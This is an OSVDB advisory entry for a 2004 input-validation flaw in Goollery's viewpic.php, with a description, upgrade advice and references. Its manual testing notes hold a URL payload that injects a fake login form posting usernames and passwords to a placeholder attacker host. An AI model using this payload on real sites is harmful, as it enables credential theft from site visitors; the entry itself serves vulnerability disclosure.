Goollery viewpic.php Arbitrary Command Execution

2004-10-31T23:58:53
ID OSVDB:11319
Type osvdb
Reporter Lostmon Lords(Lostmon@gmail.com)
Modified 2004-10-31T23:58:53

Description

Vulnerability Description

Goollery contains a flaw that may allow an attacker to remotely execute arbitrary code. The issue is due to improper validation of user input passed to the viewpic.php page variable. It is possible that the flaw may allow the attacker to execute arbitrary HTML or script code in the victim's browser in the security context of the affected site, resulting in a loss of integrity.

Solution Description

Upgrade to version 0.04b or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Goollery contains a flaw that may allow an attacker to remotely execute arbitrary code. The issue is due to improper validation of user input passed to the viewpic.php page variable. It is possible that the flaw may allow the attacker to execute arbitrary HTML or script code in the victim's browser in the security context of the affected site, resulting in a loss of integrity.

Manual Testing Notes

http://[victim]/goollery/viewpic.php?id=2&conversation_id=ffee00b71f3931a&btopage=<form%20action="http://[attacker]/save2db.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="30"><br>Password:<input%20name="password"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submit"%20value="Login"></form>

References:

Vendor URL: http://www.wirzm.ch/goollery/about/about.php Security Tracker: 1012062 Secunia Advisory ID:11320 Related OSVDB ID: 11318 Other Advisory URL: http://www.osvdb.org/ref/11/11xxx-goollery_multiple.txt ISS X-Force ID: 17957 CVE-2004-2245 Bugtraq ID: 11587